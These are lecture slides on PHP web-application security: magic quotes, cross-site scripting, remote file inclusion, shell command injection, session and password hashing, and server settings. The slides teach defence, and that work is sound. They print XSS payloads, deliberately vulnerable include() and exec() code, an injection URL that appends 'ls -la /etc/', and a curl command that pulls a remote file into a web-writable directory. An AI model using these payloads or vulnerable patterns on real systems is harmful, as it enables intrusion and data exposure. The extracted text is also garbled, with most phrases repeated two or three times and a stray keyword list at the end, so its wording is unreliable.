security issues. general considerations security is a hot topic security is a hot topic security...

Security IssuesSecurity Issues

General ConsiderationsGeneral Considerations

Security is a hot topicSecurity is a hot topic Security discussions are full of Security discussions are full of jargonjargon Zero Day ExploitZero Day Exploit Pen testingPen testing HackerHacker PharmingPharming InjectionInjection malwaremalware DOSDOS

Serious issue, but lots of FUDSerious issue, but lots of FUD

Start by Start by thinking about thinking about where you are where you are

exposedexposed

FilesystemFilesystem

Multiuser systemsMultiuser systems PHP codes executes as the web server, PHP codes executes as the web server, with the web server's permissionswith the web server's permissions

This means any file that you write via This means any file that you write via PHP might be writable by other users PHP might be writable by other users (either via PHP or a CGI program)(either via PHP or a CGI program)

Any file that's readable by the web Any file that's readable by the web server is readable by others via the server is readable by others via the web server, even if the server won't web server, even if the server won't serve them to a browser directlyserve them to a browser directly

Often web pages are world readable Often web pages are world readable

FormsForms

You're also exposed whenever you You're also exposed whenever you request data from a userrequest data from a user A user may give you data you don't A user may give you data you don't expect or wantexpect or want

Depending on how your program handles Depending on how your program handles the data, this can have a variety of the data, this can have a variety of resultsresults

Your data on the server could be Your data on the server could be affectedaffected

Other users' browsers could be Other users' browsers could be affectedaffected

Other VectorsOther Vectors

This is an aside….This is an aside…. Services such as ssh and mysqlServices such as ssh and mysql

FirewallsFirewalls DMZ DMZ Bind to different ip addressesBind to different ip addresses

What you do from the serverWhat you do from the server Where the server is located--Where the server is located--physical security is keyphysical security is key

Consider where you want Consider where you want to put your security to put your security

measuresmeasures For example, in this class I'm For example, in this class I'm trusting you all a lot, as a group, trusting you all a lot, as a group, not to trash machinesnot to trash machines

In MySQL, you can either use the In MySQL, you can either use the database to secure data, or PHP, or database to secure data, or PHP, or bothboth Both is hard to do…Both is hard to do…

In some cases, restricting access In some cases, restricting access to a domain is enough, in other ids to a domain is enough, in other ids are betterare better

BalanceBalance

Security is like a seesaw, with Security is like a seesaw, with whitehats and blackhats on the whitehats and blackhats on the endsends

What's the most secure OS?What's the most secure OS? Where is the threat coming from Where is the threat coming from these days?these days?

Categories of HacksCategories of Hacks

Data that is inserted into code Data that is inserted into code that is displayed on your pagesthat is displayed on your pages

Data that is inserted to alter Data that is inserted to alter your data your data

Holes that can be exploited to Holes that can be exploited to run arbitrary commandsrun arbitrary commands

Display HacksDisplay Hacks

Targets are bulletin boards, Targets are bulletin boards, blogs that allow comments, blogs that allow comments, wikis, web forums--anything that wikis, web forums--anything that allows users to input text that allows users to input text that will be displayedwill be displayed

At best, you might get random At best, you might get random stuff showing up on your web stuff showing up on your web pagespages

At worst, users could be At worst, users could be "captured" and whisked away"captured" and whisked away

Builtin SecurityBuiltin Security

PHP does try to protect us, but PHP does try to protect us, but sometimes that protection sometimes that protection causes it's own problemscauses it's own problems

I'm going to run through a I'm going to run through a series of examples, showing series of examples, showing some simple insertion some simple insertion techniques, and the approaches techniques, and the approaches to stop them to stop them

Magic QuotesMagic Quotes

An example of trying to do good in An example of trying to do good in a bad way….a bad way….

In the BeginningIn the Beginning

As PHP became more popular, attacks As PHP became more popular, attacks against it became more common (why against it became more common (why would this be the case?)would this be the case?)

Around PHP 3, it was in widespread Around PHP 3, it was in widespread use, but had very few security use, but had very few security features out of the boxfeatures out of the box

In particular, it did nothing to In particular, it did nothing to affect data input by formsaffect data input by forms

Version 4.2.3Version 4.2.3

To make PHP safer, version 4.2.3 To make PHP safer, version 4.2.3 included magic quotes enabled by included magic quotes enabled by defaultdefault

Magic quotes performs the same function Magic quotes performs the same function as add_slashes(), but only on any GET, as add_slashes(), but only on any GET, POST or cookie data--that is, it POST or cookie data--that is, it escapes any ',",\, or NULL characters, escapes any ',",\, or NULL characters, in an attempt to prevent folks from in an attempt to prevent folks from inserting command strings into phpinserting command strings into php

It works ok, for what it's trying to It works ok, for what it's trying to do, but isn't a complete solution…do, but isn't a complete solution…

So how does it work?So how does it work?

Magic quotes will try to protect Magic quotes will try to protect us a bit if someone inserts us a bit if someone inserts something like:something like:

<b>Alert!</b><p>Your account has <b>Alert!</b><p>Your account has been compromised, please <a been compromised, please <a href="http://www.cs.unc.edu">clihref="http://www.cs.unc.edu">click here for further ck here for further information</a></p>information</a></p>

echo_string_noslash.phpecho_string_noslash.php

This file defeats magic quotes and This file defeats magic quotes and echoes the $_GET["string"] var without echoes the $_GET["string"] var without alterationalteration

<b>Alert!</b><p>Your account has been <b>Alert!</b><p>Your account has been compromised, please compromised, please <a href="http://www.cs.unc.edu">click here <a href="http://www.cs.unc.edu">click here for further information</a></p>for further information</a></p>

Calgon, take me awayCalgon, take me away

One can also insert code that One can also insert code that moves the user from your site:moves the user from your site:

<script type=text/javascript>window.location = "http://www.duke.edu";</script>

With magic quotesWith magic quotes

echo_string.php doesn't defeat echo_string.php doesn't defeat magic quotesmagic quotes

<b>Alert!</b><p>Your account has been compromised, please <a href=http://www.cs.unc.edu>click here for further information</a></p>

Can't trust browsers Can't trust browsers anyhowanyhow

So with magic quotes if the hacker uses well formed HTML, we're okSo with magic quotes if the hacker uses well formed HTML, we're ok But what if I put this in:But what if I put this in:

Or this:Or this:<img src=http://cutedeadthings.com/images/skull-pink-tm.png><img src=http://cutedeadthings.com/images/skull-pink-tm.png>

The browser is trying to be helpful…The browser is trying to be helpful… Look at the sourceLook at the source

We don't need no quotesWe don't need no quotes

Even worse, we don't need quotes to Even worse, we don't need quotes to call for an external javascriptcall for an external javascript

This means we can insert pretty This means we can insert pretty much anything we want into the much anything we want into the page:page:

<script <script src=http://127.0.0.1/INLS672/samplesrc=http://127.0.0.1/INLS672/samples/php/security/javascript_hack.js><s/php/security/javascript_hack.js></script>/script>

This last exampleThis last example Cross site scripting (XSS) generally Cross site scripting (XSS) generally involves getting data into a web form involves getting data into a web form that produces HTML for display, and that produces HTML for display, and use that to call an external script use that to call an external script to perform a malicious actionto perform a malicious action

This is often done with javascript, This is often done with javascript, but can be done with other languagesbut can be done with other languages

Older versions of IE were prone to Older versions of IE were prone to attack in this manner because of attack in this manner because of ActiveXActiveX

Are Magic Quotes AGT?Are Magic Quotes AGT? Some say that magic quotes are badSome say that magic quotes are bad

when enabled, it can make it more difficult when enabled, it can make it more difficult to get the data you the way you want itto get the data you the way you want it

Produces a false sense of security, since Produces a false sense of security, since programmers should check user data anywayprogrammers should check user data anyway

But it does protect against the most common But it does protect against the most common attacks such as insertion of javascriptattacks such as insertion of javascript

But folks hated it enough that it's off in But folks hated it enough that it's off in PHP 6PHP 6

And that's the worst of it--if you want to And that's the worst of it--if you want to write portable code, you have to check for itwrite portable code, you have to check for it

Detecting and Detecting and Defeating Magic QuotesDefeating Magic Quotes

This is not very efficientThis is not very efficient<?phpif (get_magic_quotes_gpc()) { function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value);

return $value; }

$_POST = array_map('stripslashes_deep', $_POST); $_GET = array_map('stripslashes_deep', $_GET); $_COOKIE = array_map('stripslashes_deep', $_COOKIE); $_REQUEST = array_map('stripslashes_deep', $_REQUEST);}?>

from http://us.php.net/manual/en/function.stripslashes.php

It's up to youIt's up to you

For many samples of XSS For many samples of XSS attacks, see:attacks, see:http://ha.ckers.org/xss.htmlhttp://ha.ckers.org/xss.html

Simple SanitationSimple Sanitation

In this case, we're going to In this case, we're going to use htmlentities(), use htmlentities(), htmlspecialchars() and htmlspecialchars() and strip_tabs() to affect the strip_tabs() to affect the user's inputuser's input

see echo_string_checks.htmlsee echo_string_checks.html Be aware that this is mainly a Be aware that this is mainly a browser protection…browser protection…

Blacklist vs. WhitelistBlacklist vs. Whitelist

What we've looked at so far are What we've looked at so far are examples of blacklisting--examples of blacklisting--trying to spot evil inputtrying to spot evil input

Whitelisting is more secure--Whitelisting is more secure--figure out what you want, and figure out what you want, and only allow thatonly allow that

Using regexUsing regex

Decide what you're willing to acceptDecide what you're willing to accept Check the user input for that Check the user input for that

if (eregi("^[a-zA-Z0-9]{0,}$", $_GET['string'])) // The regex above checks every char starting with 0 { echo "String is: " . $_GET['string']; }else { echo "<p>Illegal characters detected</p>"; }

echo_string_clean.htmlecho_string_clean.html

This is the same form, but passes This is the same form, but passes data to a php script with the data to a php script with the regex coderegex code

This approach has advantagesThis approach has advantages FutureproofFutureproof Doesn't require you guess what the Doesn't require you guess what the hacker might tryhacker might try

On error, doesn't process the data at On error, doesn't process the data at allall

Downside is it's harder to get Downside is it's harder to get data throughdata through

Arbitrary CommandsArbitrary Commands

Basically, this is the worst kind of Basically, this is the worst kind of attackattack

Cracker finds a hole that allows a Cracker finds a hole that allows a command to be executedcommand to be executed

Most often that happens at the Most often that happens at the privilege level of the web serverprivilege level of the web server

In some cases, it can be an elevated In some cases, it can be an elevated privilege (rare on linux, not so privilege (rare on linux, not so rare on windows under pre-vista rare on windows under pre-vista installations)installations)

Includes and RequiresIncludes and Requires It's pretty common to use an include or It's pretty common to use an include or require to pull files into a core scriptrequire to pull files into a core script

This is a potential vector for a XSS attack, This is a potential vector for a XSS attack, since PHP doesn't care if the file included since PHP doesn't care if the file included is remote or localis remote or local

Be careful with these--if you pass file to be Be careful with these--if you pass file to be included into your script with a GET or POST, included into your script with a GET or POST, a hacker can run a script of their own a hacker can run a script of their own through yoursthrough yours

magic_quotes do not protect against thismagic_quotes do not protect against this It's one of the ways I've been hackedIt's one of the ways I've been hacked

include $_GET['file'];

How I've Been HackedHow I've Been Hacked I created a simple PHP file that included I created a simple PHP file that included other files with a GET referenceother files with a GET reference

This allowed me to call files elsewhere on This allowed me to call files elsewhere on the server inside my frame program, and the server inside my frame program, and control the display if the file were a text control the display if the file were a text file or htmlfile or html

I did not check the data being passedI did not check the data being passed The hacker passed a reference to a file on The hacker passed a reference to a file on their system, that ran a perl script their system, that ran a perl script creating an email relay on our web server, creating an email relay on our web server, and then passed email through the web server and then passed email through the web server to our smtp server, which accepted all of to our smtp server, which accepted all of the spam, since it came from within the spam, since it came from within cs.unc.educs.unc.edu

The FileThe File

http://wwwx.cs.unc.edu/help/nethttp://wwwx.cs.unc.edu/help/network/frame.phpwork/frame.php??

The problem line was:The problem line was:include($_GET[name]);include($_GET[name]);

The FixThe Fix

Changed include() to Changed include() to readfile(), the latter doesn't readfile(), the latter doesn't process code, just reads it to process code, just reads it to outputoutput

Added a check for "//" for Added a check for "//" for remote access urlsremote access urls

Added a hook to send email to Added a hook to send email to me when tappedme when tapped

Attacking the serverAttacking the server

Since PHP can pull data about the Since PHP can pull data about the server, it can be used to find out server, it can be used to find out about the server's configuration about the server's configuration (esp. the web server)(esp. the web server)

More dangerous is the ability to More dangerous is the ability to access the shell You should be access the shell You should be careful with any data that will be careful with any data that will be passed to a shell script with back passed to a shell script with back ticks, exec(), or shellexec()ticks, exec(), or shellexec()

Unguarded GET or POSTUnguarded GET or POST In this case, the In this case, the GET variable is GET variable is passed directly passed directly into a shell execinto a shell exec

We know that We know that shell script shell script lines terminated lines terminated in a ";"in a ";"

So a command can So a command can be passed in the be passed in the variable, by variable, by inserting a semi-inserting a semi-coloncolonThis example from http://www.sitepoint.com/article/php-security-blunders

$month = $_GET['month'];$year = $_GET['year'];

exec("cal $month $year", $result);print "<PRE>";foreach ($result as $r) { print "$r<BR>"; }print "</PRE>";

Unguarded GET or POSTUnguarded GET or POST

An example of a get URL:An example of a get URL: http://127.0.0.1/php/security/unguahttp://127.0.0.1/php/security/unguarded_get.rded_get.phpphp?month=9;?month=9;ls ls -la /etc/-la /etc/

This would be passed to the web This would be passed to the web server, and executed with it's server, and executed with it's permissions, so it's a better permissions, so it's a better vector for reads than writesvector for reads than writes

But any directory that the web But any directory that the web server could write to could be server could write to could be tapped….tapped….This example from http://www.sitepoint.com/article/php-security-blunders


Ok, so let's say this file sits Ok, so let's say this file sits in a directory that the web in a directory that the web server can write to (say for a server can write to (say for a user comment file, or a log, user comment file, or a log, or….)or….)

Then a hacker could pass Then a hacker could pass something more malicious, eg:something more malicious, eg:curl http://www.cs.unc.edu -o curl http://www.cs.unc.edu -o myfile.phpmyfile.php


The author The author recommends recommends using a using a regular regular expression to expression to check that the check that the input is input is solely solely numbers, and numbers, and of the correct of the correct lengthlengthThis example from http://www.sitepoint.com/article/php-security-blunders

$month = $_GET['month'];$year = $_GET['year'];

if (!preg_match("/^[0-9]{1,2}$/", $month)) { die("Bad month, please re-enter."); }if (!preg_match("/^[0-9]{4}$/", $year)) { die("Bad year, please re-enter."); }

06_mysql_submit.php06_mysql_submit.php

I'm pretty much a failure hacking MySQL I'm pretty much a failure hacking MySQL so far…so far…

But using the lab as an example, here But using the lab as an example, here are some things you can insert into the are some things you can insert into the dbdb <a href=\"http://www.cs.unc.edu\"><a href=\"http://www.cs.unc.edu\">Wonk</a>Wonk</a>

<img src=/PoweredByMacOSXLarge.gif><img src=/PoweredByMacOSXLarge.gif> It's restricted by the number of It's restricted by the number of characters allowed in the field, but you characters allowed in the field, but you get the ideaget the idea

Additional Additional Considerations for Considerations for

MySQLMySQL Don't use unrestricted Don't use unrestricted privileges for database privileges for database connections (do as I say, not as connections (do as I say, not as I do)I do) Either have the user supply a user Either have the user supply a user id and password, or use a id and password, or use a restricted accountrestricted account

Use a mysql account that is limited Use a mysql account that is limited and appropriate for the given taskand appropriate for the given task

General Server General Server SettingsSettings

register_globalsregister_globals register_globals, when on, allows php register_globals, when on, allows php full access to all variables directlyfull access to all variables directly

In my examples, I've accessed GET and In my examples, I've accessed GET and POST data via the server global array POST data via the server global array even when not necessaryeven when not necessary

With it on, $_GET["variable"] is the With it on, $_GET["variable"] is the same as $variable in phpsame as $variable in php

This gives a hacker a chance to This gives a hacker a chance to inject data into unprotected inject data into unprotected variables into your script, say into variables into your script, say into a session variablea session variable

So check to see that it's off So check to see that it's off

open_base_diropen_base_dir The default is to allow php to open any The default is to allow php to open any files, this setting can be enabled to files, this setting can be enabled to restrict what directories php can restrict what directories php can accessaccess

With a setting of ".", the tree is With a setting of ".", the tree is restricted to the folder of the script restricted to the folder of the script itself, or loweritself, or lower

Can be set for virtual servers in Can be set for virtual servers in apacheapache

Keep in mind that this setting only Keep in mind that this setting only affects php, any shell scripts you use affects php, any shell scripts you use have full run of the directory treehave full run of the directory tree

What can you do?What can you do?

(Panic?)(Panic?)

Protect your codeProtect your code

In the class pages, I've made the source In the class pages, I've made the source code visible over the webcode visible over the web This is something to avoid in general--it's This is something to avoid in general--it's easier to hack a site if you know the sourceeasier to hack a site if you know the source

Hide configuration files and dataHide configuration files and data Restrictive .htaccess filesRestrictive .htaccess files Use cron based shell scripts to whisk Use cron based shell scripts to whisk data awaydata away

Keep data and config files separate from Keep data and config files separate from scriptsscripts

Use a sealed db serverUse a sealed db server

Hiding filesHiding files

Files with a "." as the first Files with a "." as the first character are readable by PHP, but character are readable by PHP, but won't be served by a web serverwon't be served by a web server

Depending on the server Depending on the server configuration (such a the web configuration (such a the web server's FollowSymLinks setting, or server's FollowSymLinks setting, or PHP's open_base_dir setting), you PHP's open_base_dir setting), you may be able to store data files in may be able to store data files in areas that the web server won't areas that the web server won't serve upserve up

.htaccess files.htaccess files

Disallow directory listingsDisallow directory listings You can also use a blank index You can also use a blank index filefile

Restrict access by user id or Restrict access by user id or by domainby domain

See See http://www.htaccessbasics.com/http://www.htaccessbasics.com/

Directory StructuresDirectory Structures

Keep data files in one directory, Keep data files in one directory, configuration files in another, and configuration files in another, and scripts in a thirdscripts in a third

You may need to put the data and You may need to put the data and config dirs inside the scripts config dirs inside the scripts folder, but you can use folder, but you can use an .htaccess file or other methods an .htaccess file or other methods to control accessto control access

For example, write permissions or For example, write permissions or afs aclsafs acls

Open versus Sealed Open versus Sealed serversservers

Be aware of who else is on your Be aware of who else is on your serverserver

Remember that the web server has Remember that the web server has to have read privileges--if I'm to have read privileges--if I'm on the same server, I might be on the same server, I might be able to use a cgi to see your able to use a cgi to see your source codesource code

Consider a "sealed" server for Consider a "sealed" server for critical datacritical data

Finding HacksFinding Hacks

Run a hash on your scripts to Run a hash on your scripts to check for mods--there are lots check for mods--there are lots of freebie programs that can do of freebie programs that can do this for you and alert you to this for you and alert you to changeschanges

Tripwire is one example, but Tripwire is one example, but it's a complicated thingit's a complicated thing

WatcherWatcher

Keep Cookies in the jarKeep Cookies in the jar

PHP sessions PHP sessions can store can store data in data in cookies as cookies as well as well as server server side--best side--best not to do not to do this unless this unless the data's the data's not not sensitivesensitive

QuickTime™ and a decompressor

are needed to see this picture.

Keep Cookies in the jarKeep Cookies in the jar

Some browsers (ie for example) Some browsers (ie for example) have historically been prone to have historically been prone to cookie theftcookie theft

So if you store sensitive data So if you store sensitive data in a cookie, salt and encrypt in a cookie, salt and encrypt it (hash is always better with it (hash is always better with salt anyway)salt anyway)

Control Session DataControl Session Data

In the examples for class, I've In the examples for class, I've used a session to store data used a session to store data across formsacross forms

Session data is usually in /tmp Session data is usually in /tmp or /var/tmpor /var/tmp

Since the web server can read Since the web server can read these, so can any else on the these, so can any else on the server who can write web scriptsserver who can write web scripts

Protecting Session DataProtecting Session Data

To reduce the chance of To reduce the chance of hijacking, use a combination of hijacking, use a combination of data--for example, check not data--for example, check not only the session key, but also only the session key, but also the ip number (consider storing the ip number (consider storing that in post data or a text that in post data or a text file)file)

Encrypt any sensitive data Encrypt any sensitive data stored in the sessionstored in the session

cookie_monster.phpcookie_monster.php

Better StillBetter Still

Generate a random key on each Generate a random key on each page loadpage load

Check other data, such as the Check other data, such as the client ip number or browser client ip number or browser version and track that as well version and track that as well

Store data in multiple places and Store data in multiple places and compare (eg. some data in the compare (eg. some data in the session, some in a cookie, and session, some in a cookie, and even some in a database or file)even some in a database or file)

Hash is good for youHash is good for you

I've mentioned this a few I've mentioned this a few times, but you can use hashes times, but you can use hashes of data as a security measure, of data as a security measure, esp. for passwordsesp. for passwords

What is hash really?What is hash really?

createLogincreateLogin

This is some code I used for a This is some code I used for a faculty application sitefaculty application site

Users created a login with Users created a login with their email address as an idtheir email address as an id

Passwords stored in a text Passwords stored in a text file, as an MD5 hashfile, as an MD5 hash

create_login.php create_login.php

This is a simple php script that This is a simple php script that calls some HTML into itself, and calls some HTML into itself, and uses a jah like function to test uses a jah like function to test the data submitted by the user--the data submitted by the user--this check has a php backend, so this check has a php backend, so the javascript check and the the javascript check and the subsequent php check are the samesubsequent php check are the same

All it does for the password is All it does for the password is run it through md5run it through md5

$new_entry[id] = trim($_POST["get_id"]); $new_entry[passwd] = md5(trim($_POST["get_passwd"])); $new_entry[key] = $_SESSION['session_key']; $new_entry[created] = $runtime; $new_entry[status] = "new"; write_data_file($new_entry, $id_data);

create_login.php create_login.php

As the form is submitted to itself, As the form is submitted to itself, after some checks, the post data is after some checks, the post data is shoved into an array, and written to shoved into an array, and written to a filea file

The hash would be better with a saltThe hash would be better with a salt

submit_application.phpsubmit_application.php

After the id is created, or After the id is created, or when a user returns, they land when a user returns, they land on submit_application.phpon submit_application.php

This asks them for the userid This asks them for the userid and password on the first passand password on the first pass

On the second pass, it checks On the second pass, it checks the userid and data in the postthe userid and data in the post

$ids_file = read_data_file("./config/userids.txt"); $test= md5_match_array_element($ids_file, "id", $_POST["id"], "passwd", $_POST["passwd"]); if ($test > 0) { $action="submit_application: login_failure"; require './logger.php'; // call the program to write out log entries. die_cleanly("<div id=\"notice\"><p>Invalid User ID or password, if you feel you have received this message in error please contact <a href=\"http://www.cs.unc.edu/cgi-bin/mailcs?hays\"> bil hays</a></p></div>"); }

submit_application.phpsubmit_application.php Notice md5_match_array_element()Notice md5_match_array_element()

md5_match_array_elementmd5_match_array_element()()

function md5_match_array_element($array, $array_key, function md5_match_array_element($array, $array_key, $get_key, $array_element, $get_element)$get_key, $array_element, $get_element) {{ foreach ($array as $i)foreach ($array as $i) {{ if ($i[$array_key] == $get_key)if ($i[$array_key] == $get_key) {{ if ($i[$array_element] != md5($get_element))if ($i[$array_element] != md5($get_element)) { { return "1";return "1"; }} return "0";return "0"; }} }} return "2";return "2"; }}

Use of hashesUse of hashes

A hash can be used to check a A hash can be used to check a value presented against a prior value presented against a prior valuevalue

Or to detect file changes--if Or to detect file changes--if you write a big chunk of code, you write a big chunk of code, you can run a hash on the files you can run a hash on the files or the tarball. When you check or the tarball. When you check the files against the hash, you the files against the hash, you can detect a changecan detect a change

Final pointsFinal points

Keep Up To DateKeep Up To Date

Update your PHP installation Update your PHP installation regularly, and check the php.ini regularly, and check the php.ini settings when you dosettings when you do

Create Create andand check log files in your check log files in your php programs (consider automating php programs (consider automating this with a cron)this with a cron)

Read--there are web sites and Read--there are web sites and discussion lists that cover these discussion lists that cover these issues--many are a bit histrionic, issues--many are a bit histrionic, but you get good ideas anywaybut you get good ideas anyway

http:http://nexodyne//nexodyne.com/.com/ http://www.codehelp.co.uk/php/http://www.codehelp.co.uk/php/taint.phptaint.php

security issues. general considerations security is a hot topic security is a hot topic security...

Documents

pages data

secure data

server wont

web pages

ends security

physical security

exposed slide

world readable slide